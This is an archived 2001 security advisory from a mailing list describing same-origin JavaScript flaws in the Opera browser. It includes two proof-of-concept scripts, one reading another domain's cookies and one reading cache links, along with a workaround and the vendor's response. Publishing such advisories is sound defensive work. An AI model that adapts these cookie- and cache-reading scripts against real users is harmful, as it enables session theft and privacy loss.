[NEWS] Several JavaScript Vulnerabilities Found in Opera

From: support@securiteam.com
Date: 11/18/01 

From: support@securiteam.com
To: list@securiteam.com
Subject: [NEWS] Several JavaScript Vulnerabilities Found in Opera
Message-Id: <20011118121009.AFB60138BF@mail.der-keiler.de>
Date: Sun, 18 Nov 2001 13:10:09 +0100 (CET)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -

  Several JavaScript Vulnerabilities Found in Opera
------------------------------------------------------------------------

SUMMARY

Opera is a multi-platform web browser. There are several JavaScript
vulnerabilities in it, allowing script in an HTML page to programmatically
access another page and its properties in another domain - Netscape calls
this "Same Origin Vulnerability".
This makes it possible for a script in certain web page to access cookies
and links in arbitrary domains to which the user has access. It is also
possible for a script to read the links in the user's cache and history
which at least have privacy implications if not more. In some cases,
cookies and links in the cache/history may contain sensitive information
such as usernames/passwords, etc.

DETAILS

Examine the following scripts (note that '!' needs to be replaced with 'i'
for the script to be active):
-(1)----------------------------------
a=window.open("http://mail.yahoo.com");
function f()
{
xx=a.document.cookie;
alert("hi"+xx);
a.document.open();
a.document.write("<h1>aa</h1><script>x=window.open('http://mail.yahoo.com');
setTimeout('z=x.document.cookie;alert(z);',5000)</"+"scr!pt>");
a.document.close();
}
setTimeout("f()",5000);
-----------------------------------

-(2)--------------------------------
a=window.open("about:cache");
function f()
{
xx=a.document.links[2];
alert("hi="+xx);
}
setTimeout("f()",5000);
-----------------------------------

In addition, the HotJava exploit at
<http://www.guninski.com/hotjava1-desc.html>
http://www.guninski.com/hotjava1-desc.html works on Opera as
Jay@InfoAve.net pointed out.

Workaround:
Disable javascript (Opera suggests enabling "Use cookies to trace password
protected documents")

Vendor status:
The vendor was notified on 5 November 2001 and was asked whether a fix
shall be issued and when. The reply was:

You should be able to resolve the cookie issue by enabling "Use cookies to
trace password protected documents", which means that pages with password
protection aren't cached, cookies aren't stored, the URL shouldn't be
displayed in History, etc. This is a "paranoia" option, and makes a few
pages unusable. As you are probably aware, many web technologies aren't
very secure, but it is inconvenient for the user to block these.
This is why the user should be given a choice to block privacy related
information.

ADDITIONAL INFORMATION

The information has been provided by <mailto:guninski@guninski.com>
Georgi Guninski.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Relevant Pages